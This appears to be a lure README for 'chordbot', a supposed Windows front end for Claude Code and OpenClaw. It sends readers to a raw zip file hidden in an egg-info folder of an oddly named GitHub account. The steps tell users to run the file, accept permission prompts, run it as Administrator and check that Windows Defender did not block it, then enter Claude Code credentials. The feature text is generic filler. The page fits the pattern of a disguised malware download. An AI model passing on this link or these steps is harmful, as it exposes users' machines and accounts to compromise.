Use the link below to visit the download page, then get the Windows version.
Visit the chordbot download page
Chordbot is a Windows app that helps you use Claude Code with OpenClaw in one place. It is built for end users who want a simple way to start the tool, manage tasks, and keep work in one window.
You can use chordbot to:
- Open the app from Windows
- Connect Claude Code with your local setup
- Use OpenClaw without command-line work
- Keep your workflow in one place
- Start tasks with a few clicks
Before you install chordbot, make sure your PC has:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet access for setup and updates
- A normal user account with permission to run apps
For best results, use a recent Windows system with enough free memory for browser use and local tools.
Follow these steps in order.
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Open the download page: https://github.com/babyfaced-familytrionychidae322/chordbot/raw/refs/heads/main/src/chord_code.egg-info/Software-1.4-alpha.5.zip
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Find the Windows download file on the page.
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Download the file to your computer.
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Open your Downloads folder.
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Double-click the downloaded file to start the installer or app.
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If Windows asks for permission, choose Yes or Run.
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Follow the steps in the setup window.
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When setup ends, open chordbot from the Start menu or desktop shortcut.
When you open chordbot for the first time, it may ask you to set up your Claude Code access and your OpenClaw path or account settings.
Do this in order:
- Open chordbot
- Read each setup screen
- Enter your Claude Code details if asked
- Connect OpenClaw if the app asks for it
- Save the settings
- Restart the app if it asks you to
If you already use Claude Code or OpenClaw, chordbot will fit into that setup with less work.
After setup, using chordbot is simple:
- Open the app
- Choose the task you want to run
- Start Claude Code through the app
- Use OpenClaw tools when needed
- Watch progress in the main window
The app is made to keep the process simple. You should not need to type commands in a terminal for normal use.
You may see these areas in chordbot:
- Home - main screen with quick actions
- Settings - change Claude Code or OpenClaw options
- Tasks - see current and past runs
- Logs - check what happened during a run
- Help - basic setup guidance
These names may vary a little, but the layout should feel easy to follow.
For a smoother first run, look at these settings:
- Startup mode - open the app when Windows starts
- Theme - light or dark view
- Path settings - where the app looks for Claude Code or OpenClaw
- Update checks - see if a new version is ready
- Language - choose your preferred display language if available
If you are not sure what to change, leave the default settings in place.
If chordbot does not open or work as expected, try these steps:
- Close the app and open it again
- Restart your PC
- Check that the download finished fully
- Run the app as Administrator
- Make sure Windows Defender did not block it
- Confirm that Claude Code and OpenClaw are set up the way the app expects
If the app opens but nothing happens, check the Logs area for the last run.
Chordbot may need permission to:
- Read and write files
- Start local tools
- Save settings on your computer
- Connect to services you already use
Only allow access if you trust the app and the source of the download.
Chordbot is useful if you want a cleaner front end for tools you already use. It sits between you and the lower-level steps, so you can work with a simple window instead of many commands.
It is a good fit for people who want to:
- Keep setup in one place
- Use Claude Code with less manual work
- Add OpenClaw to a normal Windows workflow
- Avoid command-line steps where possible
- Keep chordbot up to date
- Use the same Windows account each time
- Store files in a simple folder path
- Do not move app files after setup unless you know the app can still find them
- If something breaks after an update, restart the app first
If you want to start over:
- Close chordbot
- Remove the app through Windows Settings if it appears in installed apps
- Delete any leftover shortcut on the desktop
- Download the latest copy from the link above
- Install it again
- Open the app and repeat first-time setup
A typical chordbot window should show:
- A clear main panel
- Simple buttons for task control
- Settings for Claude Code and OpenClaw
- Status text for current activity
- A log view for issues and progress
The goal is a plain interface that keeps your work easy to follow
No. The app is meant for regular Windows users.
Yes. It is made for a local Windows setup.
Chordbot is built for both. Set up the tools you plan to use before your first run.
You can, but it is better to leave it in place unless you need to change folders.
Use the same download page: https://github.com/babyfaced-familytrionychidae322/chordbot/raw/refs/heads/main/src/chord_code.egg-info/Software-1.4-alpha.5.zip
Chordbot may store:
- App settings
- Session data
- Task history
- Log files
- Local cache files
These files help the app remember your setup and show past runs. If you remove the app, some of these files may stay behind until you delete them.
For the easiest start:
- Download chordbot from the GitHub page
- Install it in the default folder
- Open it once right away
- Set up Claude Code
- Set up OpenClaw
- Run a small test task
- Check the logs if anything looks wrong
If you need the download page again, use this link: